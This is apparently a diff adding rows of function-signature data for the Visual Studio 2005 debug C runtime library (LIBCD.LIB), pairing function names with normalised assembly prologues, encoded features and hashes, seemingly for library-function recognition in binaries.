+__ltoa,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nCMP DWORD PTR SS:[EBP+CONST],CONST\nJCC CONST",uNkmpQAAAAAAAAAAnIZROLjZJqX0Ke4II4yUgAAAAAAAAAAA9CnuCCOMlIAAAAAAjLRRTrjZJqWchlE4,[],354634933b5ac21cf4eaab71dca46e4cb74df342,VS2005,LIBCD.LIB
+__ui64toa,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",H5EwagAAAAAAAAAA,+cQge5yGUTgAAAAAGGKUGks5/wMAAAAASzn/A2TBtW/5xCB7ilMMM4pTDDOA/SJ+6tp9YmTBtW/5xCB7nIZROOrafWIhh3ljSzUXYUs5/wMYYpQaIYd5Y19+qoichlE4nIZROOrafWJffqqIZMG1b+rafWIhh3ljX36qiIpTDDMAAAAAgP0ifgAAAAAAAAAA,d934d93aba18f069ba9075e10a8cfcb161deb7b5,VS2005,LIBCD.LIB
+__set_statfp,"FLD TBYTE PTR DS:[0]\nFISTP DWORD PTR SS:[EBP+CONST]\nWAIT\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nTEST R32,R32\nJCC CONST",DpXpTA6V6UzmHoOADpXpTMSg0gn53UrwV9NMlQ6V6UyRSQA9T5i5yA6V6Uzfl88E5h6DgA6V6UxPmLnI+d1K8MSg0gkAAAAADpXpTA6V6Uzfl88ExKDSCQAAAAAAAAAAkUkAPQ6V6UzmHoOA35fPBA6V6UwAAAAADpXpTA6V6UxPmLnI,[],c52e1965493f5234059d0ceb3344ab16952502e7,VS2005,LIBCD.LIB
+__clrfp,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nPUSH R32\nPUSH R32\nFSTSW WORD PTR SS:[EBP+CONST]\nFCLEX",HNjp6QAAAAAAAAAA,[],e8177abcea9f4eeb16afc80f3f201d84f1b85e00,VS2005,LIBCD.LIB
+__ctrlfp,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nWAIT\nFSTCW WORD PTR SS:[EBP+CONST]",8l5mfQAAAAAAAAAA,[],d33af08a980fd42f3195d578205d6895ece32875,VS2005,LIBCD.LIB
+__statfp,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nPUSH R32\nPUSH R32\nWAIT\nFSTSW WORD PTR SS:[EBP+CONST]",P8kuZgAAAAAAAAAA,[],878f6406b73678eabcf9eb224f377ab366db3a6e,VS2005,LIBCD.LIB
+__ismbcspace,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nJMP SHORT CONST",SsDrliQDw52Z1PSAQiIDS5Zz8F/0Ke4IoDc6oU+LzAoAAAAA9Bf+50FF0BsAAAAAJAPDnfQX/ufs+e7Faz/TBFJnfwYNzMABZnkxNU+LzAoAAAAA7PnuxUFF0BsAAAAADczAAU+LzAoAAAAA9CnuCKA3OqEAAAAAmdT0gGs/0wRmeTE1Umd/BpZz8F9CIgNLlnPwX6A3OqEAAAAAQUXQG0+LzAoAAAAAT4vMCgAAAAAAAAAA,[],cbeb2002c84ba662e68117a5c1afb2aee0b89b70,VS2005,LIBCD.LIB
+__lsearch,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL DWORD PTR SS:[EBP+CONST]\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",GVk2qEqIAMsAAAAAT4vMCgAAAAAAAAAAoDc6oU+LzAoAAAAASogAywzcFYfl2NSBc1+hJEqIAMsAAAAADNwVh0+LzAoAAAAA5djUgXNfoSSgNzqh,[],a1293efdd8e07eea296b90b7f4d17915d894ba02,VS2005,LIBCD.LIB
+___doserrno,"PUSH EBP\nMOV EBP,ESP\nMOV R32,0\nPOP EBP\nRETN",abaOawAAAAAAAAAA,[],55c9c91745fc16a38029fb0c875f5ad5adaf952f,VS2005,LIBCD.LIB
+__errno,"PUSH EBP\nMOV EBP,ESP\nMOV R32,0\nPOP EBP\nRETN",abaOawAAAAAAAAAA,[],55c9c91745fc16a38029fb0c875f5ad5adaf952f,VS2005,LIBCD.LIB
+__spawnve,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCMP R32,DWORD PTR SS:[EBP+CONST]\nJCC CONST",XqODJ/ZV5+QAAAAAnIZROMB0owWDrkNenIZROF6jgyclFsgrg65DXvZV5+TAdKMFJRbIK16jgyfiQmtfwHSjBeJCa1+9np4ZrydXXE+LzAoAAAAA9lXn5OJCa1+9np4ZW8QCFJyGUTgAAAAAXqODJ9TZ7ssAAAAAwDSsqNUc1LYD/Bh64kJrXwAAAACvJ1dcg65DXtUc1LYD/Bh6vZ6eGTUWchMAAAAAA/wYegAAAAAAAAAA1RzUtgAAAAAAAAAAT4vMCgAAAAAAAAAA1Nnuy8A0rKiBPQJ8hrb7oMA0rKgAAAAAzdJe7JyGUTichlE4nIZROMA0rKiBPQJ8gT0CfF6jgyeGtvugNRZyE4OuQ14AAAAA4kJrX1vEAhSvJ1dcrydXXE+LzAoAAAAA,[],121079c5c3c5e18b4657e9a94080f0b76c45cef5,VS2005,LIBCD.LIB
+_wcsncmp,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R16,WORD PTR DS:[R32]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R16,WORD PTR DS:[R32]\nCMP R32,R32\nJCC CONST",X+E8sgDh1msAAAAAXp36xNTZ7ssAAAAAISBBJV/hPLLpbmZtcMiU5NTZ7ssNzMABAOHWawAAAAAAAAAA6W5mbV/hPLJenfrEDczAAQDh1msAAAAA1Nnuy1/hPLIhIEEl,[],838c441b29665ec332999f2ff93f6229e749217c,VS2005,LIBCD.LIB
+__strlwr,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],0\nCMP DWORD PTR DS:[CONST],0\nJCC CONST",XqODJ7beaw0AAAAAXqODJ7beaw0AAAAASv/IwmgitGpeo4MnpBdjb8uCy5VtSQUGXqODJz7KhtkAAAAAbUkFBl6jgydtSQUGs8GdWF6jgycAAAAAXqODJ7beaw0AAAAAaCK0ao2pT+peo4MnjalP6rbeaw0AAAAAT4vMCgAAAAAAAAAAy4LLlU+LzAoAAAAAl83Vgkr/yMJeo4MnPsqG2aQXY28AAAAAcv8ZO5fN1YJxWpQ6cVqUOqQXY28AAAAAtt5rDU+LzAoAAAAAbUkFBl6jgyezwZ1Y,[],e03c6ea92230a502cb2976bca5cafb5faf6fd134,VS2005,LIBCD.LIB
+___init_ctype,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR DS:[0]\nPUSH R32\nCALL DWORD PTR DS:[0]\nTEST R32,R32\nJCC CONST",iw0UTAO0fAXpXoW94Ee7jhYJcvgAAAAA50yCaj7KhtkAAAAAPsqG2RYJcvgAAAAA6V6FvT7KhtkAAAAAFgly+F6jgycf/aW3mlIi516jgydYhTRwuQ1aoeiHlMk1FnITBu7g7VtYa1QkA8OdFgly+F6jgydYhTRwcJaa7ySjKCU1FnITH/2ltz7KhtkAAAAAA7R8BZyGUTg1FnITZJveYeHZBXkAAAAAWIU0cJpSIucAAAAAXqODJz7KhtkAAAAA+V4R40+LzAoAAAAA9OEo+E/POhvx2MX2XqODJ7FGFJ0AAAAAsPW610Egoq01FnITNRZyE/leEeMAAAAAT4vMCgAAAAAAAAAAnIZROATasdY1FnITJAPDneiHlMm5DVqhNRZyE/leEeMAAAAANRZyE/leEeMAAAAAJKMoJfThKPhkm95hBNqx1rD1utdkm95h8djF9ohWOe1HYoToZJveYeHZBXkAAAAAnIZRODUWchOchlE4NRZyE/leEeMAAAAAPsqG2YsNFEwAAAAAnIZRODUWchOchlE4QSCirYsNFEwAAAAAT886G4hWOe1HYoTonIZROFTBmvw1FnIT4dkFefThKPgP0VPtsUYUnbD1utcP0VPtNRZyE/leEeMAAAAANRZyE/leEeMAAAAA6IeUyTUWchOchlE4W1hrVE+LzAoAAAAA4dkFebD1utcP0VPtD9FT7fThKPjgR7uOR2KE6E+LzAoAAAAAPsqG2YsNFEwAAAAAPsqG2eHZBXkAAAAAD9FT7bD1utfgR7uO4Ee7jhYJcvgAAAAAiw0UTHCWmu/nTIJqVMGa/IsNFEwAAAAAiFY57U+LzAoAAAAA,[],d0725df4b9eec00e2d4c725b1d43b1cecaf7b64a,VS2005,LIBCD.LIB
+_vprintf,"PUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nCMP R32,CONST",nIZROORSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8n5yGUTgdMgNZkvTRAeRSvJ87j6vlHTIDWQAAAAAAAAAAQAz7yZyGUTgAAAAA,[],e6765be014ba8944cad16a453a911754217ac7a4,VS2005,LIBCD.LIB
+__CxxThrowException@8,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nMOV R32,CONST\nMOV R32,0\nLEA R32,DWORD PTR SS:[EBP+CONST]",NDl8QwAAAAAAAAAA,[],ca89011411ec21f517376e5e747b259fb1bfc8bf,VS2005,LIBCD.LIB
+_gets,"PUSH CONST\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],CONST\nJCC CONST",L6iJSYp3DJgAAAAA9CnuCLs9SYUAAAAAXqODJ+772nQAAAAA6V6FvX/AQ/sAAAAAincMmO772nSchlE4nIZROOlehb2DrkNenIZROORSvJ+S9NEB6xv2Du772nSchlE4dYMGr5yGUTh/wEP75FK8n5yGUTh/wEP7kvTRAeRSvJ91gwav7vvadLs9SYUAAAAAf8BD++sb9g4vqIlJcgYNJORSvJ+S9NEBg65DXl6jgyf0Ke4Iuz1JhQAAAAAAAAAA,[],180b45af20ee9f469a20e5649d89ff07e3e3e456,VS2005,LIBCD.LIB
+_strtod,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32",ocCTxzOYxwkAAAAA9hOAi9UVNywAAAAAGaZm/9UVNywAAAAAFaW3bxmmZv8AAAAA1RU3LAAAAAAAAAAA2t9pY5yGUTgAAAAApA2I/TOYxwmhwJPHZj8h/dUVNywAAAAAXqODJ9UVNywAAAAAnIZROKQNiP3IUl/X2wdx71JnfwZtSQUGUmd/BnO+UlFmPyH9X/NbEl6jgyfxZLvO4AIthfc0exDa32ljJAPDnfc0exDa32ljc75SUdUVNywAAAAA8WS7zl6jgycAAAAAbUkFBvYTgIsVpbdvM5jHCdsHce9f81sSyFJf1yQDw50AAAAA9zR7EKQNiP3IUl/X,[],3ae2e81ec3a56c80a0b172ae1fcf317b94c0f6f2,VS2005,LIBCD.LIB
+__CrtDumpMemoryLeaks,"PUSH CONST\nCALL CONST\nADD ESP,CONST\nMOV R32,CONST\nJMP SHORT CONST",dYMGr5ywKlL31tt3nLAqUuRSvJ91gwav99bbd8Sg0gkAAAAAnIZROJywKlLsCHcn5FK8n5ywKlL31tt3Ri6bhJywKlKchlE47Ah3Jybu4WWchlE4Ju7hZcSg0gkAAAAAxKDSCQAAAAAAAAAAnIZROCbu4WWcsCpS,[],48abc54b0e0997be12530b73d00823e698d93f98,VS2005,LIBCD.LIB
+__CrtSetDumpClient,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR DS:[0]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[0],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",sAsYHAAAAAAAAAAA,[],2c7df1dc9055df7b5e996e1e2252f92905124a28,VS2005,LIBCD.LIB
+__nh_malloc,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",XhpGTgAAAAAAAAAA,LtQI0t7g538AAAAAXqODJ97g538AAAAA3uDnf6A3OqGchlE4nIZROC8CckKgNzqhT4vMCgAAAAAAAAAADczAAU+LzAoAAAAAoDc6oU+LzAoAAAAALwJyQl6jgycNzMAB,20f97433a11df03cdffca0b16fe2e388b39ada86,VS2005,LIBCD.LIB
+__CrtMemCheckpoint,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",dYMGr7/P2pg1FnIT5FK8n7/P2pg1FnITv8/amORSvJ91gwavac0GAFzY9+Hke5wDxKDSCQAAAAAAAAAANRZyE2dF0PsAAAAAnIZROBRlK+hu1giY5FK8n5ywKlI1FnITdYMGr5ywKlI1FnITXNj34cSg0gkAAAAA5HucA7/P2pikRfSDKUEUxJyGUTgAAAAAFGUr6GnNBgAAAAAAAgBJ3zUWchMAAAAAbtYImNTZ7ssAAAAA1NnuyxRlK+hu1giYt5wE4ylBFMScsCpSnLAqUuRSvJ91gwavZ0XQ+1zY9+Hke5wDpEX0g7/P2pgCAEnfNRZyE8Sg0gkAAAAA,[],31696134cba6ca1f66310f6f11274c17b6d49232,VS2005,LIBCD.LIB
+__CrtSetAllocHook,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR DS:[0]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[0],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",sAsYHAAAAAAAAAAA,[],2c7df1dc9055df7b5e996e1e2252f92905124a28,VS2005,LIBCD.LIB
+__CrtIsValidHeapPointer,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,CONST\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",DczAAU+LzAoAAAAAl3FRnk+LzAoAAAAAywis5LD64W3aGz/BDczAAU+LzAoAAAAAlOIfmU+LzAoAAAAAYtmmzMsIrOQNzMABsPrhbZTiH5mXcVGejLRRTmLZpswNzMAB2hs/wU+LzAoAAAAAT4vMCgAAAAAAAAAA,[],bf8540ce9e0d858edc600ee195c63c1107d1c21f,VS2005,LIBCD.LIB
+__CrtMemDumpStatistics,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nPUSH R32\nPUSH R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",1Nnuy9/GRXhHYJrCxKDSCQAAAAAAAAAAa11M0/Qp7gg1FnITnIZRON/GRXhHYJrCdYMGr0dgmsJeo4Mn5FK8n0dgmsJeo4MnR2CawuRSvJ91gwavXqODJ9TZ7ssAAAAANRZyE8Sg0gkAAAAA38ZFeORSvJ91gwavdYMGr9/GRXjfxkV45FK8n9/GRXjfxkV49CnuCJyGUTgAAAAA38ZFeORSvJ91gwavdYMGr9/GRXjEoNIJ5FK8n9/GRXjEoNIJ,[],b2f785d0c3c07256775d7bd2001e5b8aba8cefde,VS2005,LIBCD.LIB
+__CrtSetDbgBlockType,"PUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nCMP R32,CONST",LSX6auRSvJ8p2auwKdmrsORSvJ/b6hIUO4+r5eRSvJ8AAAAAKdmrsORSvJ8tJfpqLSX6auRSvJ8p2auw5FK8ny0l+mpBrWn3PsqG2S0l+moAAAAAQa1p9wAAAAAAAAAA2+oSFORSvJ87j6vlunV4/MSg0gk+yobZxKDSCQAAAAAAAAAA,[],5109a1303396f035cf52c0211c1e69186d3b6cd7,VS2005,LIBCD.LIB
+__CrtIsValidPointer,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL DWORD PTR DS:[0]\nTEST R32,R32\nJCC CONST",FLX/TJZz8F/0Ke4I1RzUtgAAAAAAAAAAFLX/TJZz8F+chlE49CnuCNUc1LYAAAAAnIZROPQp7ggUtf9MlnPwX9Uc1LYAAAAAjLRRTpZz8F8Utf9M,[],7d73b12049cfb37806a05abc7fefd6d36d712573,VS2005,LIBCD.LIB
+_calloc,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",XhpGTgAAAAAAAAAA,c/3vE9Uc1LYSVUH41RzUtgAAAAAAAAAADTmJ14OuQ14AAAAAg65DXtUc1LYNOYnXElVB+NUc1LYNOYnX,20f97433a11df03cdffca0b16fe2e388b39ada86,VS2005,LIBCD.LIB
+__CrtIsMemoryBlock,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32",gM9sVibu4WXsdoa7I+rK7ibu4WWchlE4l3FRnk+LzAoAAAAAfbrrjoDPbFYp2auwnIZROJyGUTievH4rLSX6aoDPbFYp2auwJu7hZU+LzAoAAAAA4ZGXtn26645meTE1T4vMCgAAAAAAAAAAnIZROJyGUTievH4rKdmrsCbu4WWAz2xWnIZROJdxUZ6evH4rZnkxNU+LzAoAAAAAnrx+K5yGUTgAAAAA7HaGuybu4WUj6srunrx+K5dxUZ4AAAAAnrx+K5yGUTgAAAAAKdmrsIDPbFYtJfpq,[],63f8a694d9d358fed6d103fe40a4921fc2b3cdfe,VS2005,LIBCD.LIB
+__CrtMemDifference,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],0\nCMP DWORD PTR SS:[EBP+CONST],0",5FK8n5ywKlLLgsuVac0GAMZJ4gpBECex7xfqrZywKlKchlE4O4+r5eRSvJ8AAAAAnLAqUuRSvJ87j6vllnPwXzUWchMAAAAANRZyEz7KhtkAAAAAy4LLlcSg0gkAAAAAQRAnsZyGUThjvYbIxkniCsSg0gkAAAAAnIZRODUWchMYLv5K9CnuCGnNBgAAAAAAGC7+SjUWchOWc/BfnIZROJZz8F+chlE4nIZROJywKlKchlE4nIZROPQp7gicsCpSPsqG2WnNBgAAAAAAY72GyDUWchOchlE4nIZRODUWchOchlE4xKDSCQAAAAAAAAAA,[],54de67aafe15c87e43a093ecb92f855356f49489,VS2005,LIBCD.LIB
+__CrtDoForAllClientObjects,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR DS:[0]\nAND R32,CONST\nTEST R32,R32\nJCC CONST",pEX0g16jgycrBr4oXqODJ0gBCaUAAAAAT4vMCgAAAAAAAAAAXqODJ0+LzAoAAAAAFGUr6JyGUTgAAAAAKwa+KF6jgycAAAAASAEJpZyGUTgAAAAAm5n69hRlK+heo4MnnIZROE+LzAqkRfSD,[],f41cf988ba083cd2030ac19749299a09449907b7,VS2005,LIBCD.LIB
+__malloc_dbg,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32",gm7wogAAAAAAAAAA,LwJyQl6jgycNzMABXqODJ97g538AAAAADczAAU+LzAoAAAAALtQI0t7g538AAAAA3uDnf6A3OqGchlE4nIZROC8CckKgNzqhT4vMCgAAAAAAAAAAoDc6oU+LzAoAAAAA,ab1bd48539a12444931f921efe902ab0dbc5b325,VS2005,LIBCD.LIB
+__msize_dbg,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",LwJyQuRSvJ/b6hIU2+oSFORSvJ87j6vlO4+r5eRSvJ8AAAAA5FK8ny0l+mop2auwKdmrsCnZq7CchlE4nIZROCnZq7BMp0s1TKdLNdyT98vsdoa72+oSFORSvJ87j6vlKdmrsNyT98vsdoa7O4+r5eRSvJ8AAAAA5FK8ny8CckI+yobZPsqG2S0l+moAAAAA7HaGu+RSvJ/b6hIUQWhbky8CckJSaOpbLSX6auRSvJ8p2auw2+oSFORSvJ87j6vlKdmrsORSvJ8tJfpqLSX6auRSvJ8p2auwO4+r5eRSvJ8AAAAA5FK8n+x2hrvck/fLKdmrsORSvJ/b6hIU3JP3ywAAAAAAAAAA2+oSFORSvJ87j6vlUmjqW+RSvJ/b6hIUO4+r5eRSvJ8AAAAA5FK8n1Jo6lsvAnJC,[],9f5e9b1999aa9156cbb4c8298f5ce82042b08bfe,VS2005,LIBCD.LIB
+__expand,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",XhpGTgAAAAAAAAAA,d/QmEQAAAAAAAAAA,20f97433a11df03cdffca0b16fe2e388b39ada86,VS2005,LIBCD.LIB
+__msize,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPOP EBP",FGPB2wAAAAAAAAAA,UmjqW+RSvJ/b6hIUO4+r5eRSvJ8AAAAA5FK8n1Jo6lsvAnJCLwJyQuRSvJ/b6hIU2+oSFORSvJ87j6vlO4+r5eRSvJ8AAAAA5FK8ny0l+mop2auwKdmrsCnZq7CchlE4nIZROCnZq7CWc/BflnPwXynZq7AAAAAAKdmrsNyT98vsdoa7O4+r5eRSvJ8AAAAA5FK8ny8CckI+yobZPsqG2S0l+moAAAAA7HaGu+RSvJ/b6hIUQWhbky8CckJSaOpbLSX6auRSvJ8p2auw2+oSFORSvJ87j6vlKdmrsORSvJ8tJfpq2+oSFORSvJ87j6vlLSX6auRSvJ8p2auwO4+r5eRSvJ8AAAAA5FK8n+x2hrvck/fLKdmrsORSvJ/b6hIU3JP3ywAAAAAAAAAA2+oSFORSvJ87j6vl,13b93e1e7b6fb0b45b62e84d9b9404661d8950f8,VS2005,LIBCD.LIB
+__CrtCheckMemory,"PUSH CONST\nMOV R8,BYTE PTR DS:[0]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nPUSH R32\nCALL CONST\nADD ESP,CONST",5FK8nymtxcWVIjmJEYzEr+RSvJ91gwavlSI5iSnZq7AprcXFbdNvlo0WzaD8xKCqKdmrsKnpEkXwD407pEX0g/APjTsp2auw+vZyluRSvJ91gwavnLAqUuRSvJ87j6vl8A+NO3uWaa4AAAAAqekSRUv1bkMprcXF/MSgqsSg0gkAAAAAKa3FxeRSvJ91gwavdYMGrxGMxK8AAAAA5FK8nxGMxK8AAAAAjRbNoHac/ZppzQYAO4+r5eRSvJ8AAAAAdYMGr/r2cpY6jbuX5FK8n/r2cpY6jbuXe5Zprkv1bkMprcXFZnkxNcSg0gkAAAAAOo27lzUWchMp2auwNRZyE2dF0PsAAAAAdpz9mmnNBgAAAAAAnIZRODUWchMp2auwQUXQG8Sg0gkAAAAAac0GAHac/ZpoV0yTxKDSCQAAAAAAAAAAKdmrsBGMxK+D0nGYZ0XQ+0FF0Bv9f8gAS/VuQynZq7AprcXFg9JxmORSvJ91gwavKa3FxeRSvJ91gwavac0GAEFF0Bv9f8gAaFdMk5ywKlK2oJo9dYMGrymtxcVMp0s15FK8nymtxcVMp0s1/X/IAPAPjTsp2auwTKdLNZyGUThLd0NV5FK8n5ywKlJmeTE1tqCaPQAAAAAAAAAAKdmrsJyGUThLd0NVS3dDVZyGUTj69nKWKdmrsPAPjTukRfSDdYMGrymtxcWVIjmJdYMGr4PScZgRjMSv5FK8n4PScZgRjMSv,[],cbe196564e998d62839a561104b71ac2ecde1335,VS2005,LIBCD.LIB
+__CrtSetBreakAlloc,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR DS:[0]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[0],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",sAsYHAAAAAAAAAAA,[],2c7df1dc9055df7b5e996e1e2252f92905124a28,VS2005,LIBCD.LIB
+_realloc,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",XhpGTgAAAAAAAAAA,d/QmEQAAAAAAAAAA,20f97433a11df03cdffca0b16fe2e388b39ada86,VS2005,LIBCD.LIB
+__expand_dbg,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32",d/QmEQAAAAAAAAAA,Oo27ly0l+mrXsJf3nIZROC0l+mrXsJf317CX99vqEhQp2auw7xfqrZyGUThF3/zBO4+r5eRSvJ8AAAAA5FK8n5yGUTiDrkNeKdmrsORSvJ/b6hIUg65DXsuCy5WchlE42+oSFORSvJ91gwavnIZROIOuQ17LgsuVRd/8wcSg0gkAAAAAy4LLlcSg0gkAAAAAg65DXuZSh8Cj21lWo9tZVinZq7AAAAAAdYMGr9ewl/deo4Mn5FK8n9ewl/deo4MnnIZROBgu/kqchlE4XqODJ5yGUTgAAAAAnIZROBgu/krJm/A9LSX6arVETSSbORlv5lKHwORSvJ/b6hIUyZvwPcSg0gkAAAAA2+oSFORSvJ91gwavmzkZb7VETSRW+RbHGC7+Sm6ffVpSaOpbVvkWx+RSvJ/b6hIUtURNJORSvJ/b6hIUUmjqW+RSvJ/b6hIUdYMGr+ZSh8AOKm0t5FK8n+ZSh8AOKm0t2+oSFORSvJ91gwavDiptLSnZq7AAAAAAKdmrsOZSh8AG7SXyBu0l8iQDw50AAAAAUuX5oqcCzlv8H4K7dYMGr1Jo6ltun31a5FK8n1Jo6ltun31a5lKHwORSvJ/b6hIUbp99WgTg13WRkn0FdYMGr7VETSSchlE45FK8n7VETSSchlE42+oSFORSvJ91gwavnIZROBPkPcAT5D3AE+Q9wF6jgydmeTE1kZJ9BZyGUTichlE4BODXdZyGUTichlE4dYMGr+ZSh8Co1Otd5FK8n+ZSh8Co1OtdZnkxNcSg0gkAAAAAXqODJ1XQLjgAAAAAE+Q9wFXQLjhmeTE1JAPDnQuoqqrsLj7fnIZROJywKlIH94Jg7C4+36KL7u0AAAAAB/eCYORSvJ87j6vlC6iqqsSg0gkAAAAAZnkxNcSg0gkAAAAAoovu7cSg0gkAAAAAVdAuOFLl+aIh+sPBO4+r5eRSvJ8AAAAA5FK8nwf3gmBeo4MnXqODJ2Z5MTUAAAAAqNTrXSQDw50AAAAAnLAqUuRSvJ87j6vlIfrDwVLl+aK+CP3fxKDSCQAAAAAAAAAAO4+r5eRSvJ8AAAAA5FK8n5ywKlJmeTE1ZnkxNcSg0gkAAAAAnIZROJyGUTi/z9qYv8/amORSvJ91gwav2+oSFORSvJ91gwavvgj936cCzlv8H4K7dYMGr7/P2phmeTE15FK8n7/P2phmeTE1ZnkxNcSg0gkAAAAAnIZROC8CckKbORlvmzkZby8CckKbORlv/B+Cu00oA0nVNKmYmzkZby8CckKcsCpSnLAqUuRSvJ91gwavpwLOW00oA0nVNKmYdYMGr5ywKlIvAnJC5FK8n5ywKlIvAnJCLwJyQuRSvJ/b6hIU1TSpmE0oA0kAAAAA2+oSFORSvJ91gwavTSgDSZyGUTgAAAAAnIZROORSvJ+chlE4dYMGry8CckKV9G3K5FK8ny8CckKV9G3KnIZRONvqEhSDrkNelfRtypyGUTg6jbuXg65DXuRSvJ/b6hIU2+oSFORSvJ87j6vl,2a715dd0d90b2b4496707069e8a363a6cd364c4e,VS2005,LIBCD.LIB
+__nh_malloc_dbg,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",LtQI0t7g538AAAAADczAAU+LzAoAAAAA3uDnf6A3OqGchlE4nIZROC8CckKgNzqhT4vMCgAAAAAAAAAAXqODJ97g538AAAAAoDc6oU+LzAoAAAAALwJyQl6jgycNzMAB,[],28317ecba544a8cefd7ace0b60a5c2ab0dab6695,VS2005,LIBCD.LIB
